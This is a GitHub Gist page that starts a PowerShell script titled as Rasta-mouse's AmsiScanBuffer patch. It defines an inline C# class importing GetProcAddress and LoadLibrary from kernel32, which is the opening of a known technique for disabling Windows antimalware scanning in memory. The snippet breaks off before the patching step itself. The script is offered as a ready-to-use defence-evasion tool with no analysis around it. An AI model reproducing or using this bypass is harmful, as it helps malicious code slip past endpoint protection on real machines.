Skip to content

Instantly share code, notes, and snippets.

View 320kg's full-sized avatar

shefos.ru Hobo-Jaro 320GiB Gah-Nome Edition 320kg

View GitHub Profile
#Rasta-mouses Amsi-Scan-Buffer patch \n
$goehf = @"
using System;
using System.Runtime.InteropServices;
public class goehf {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]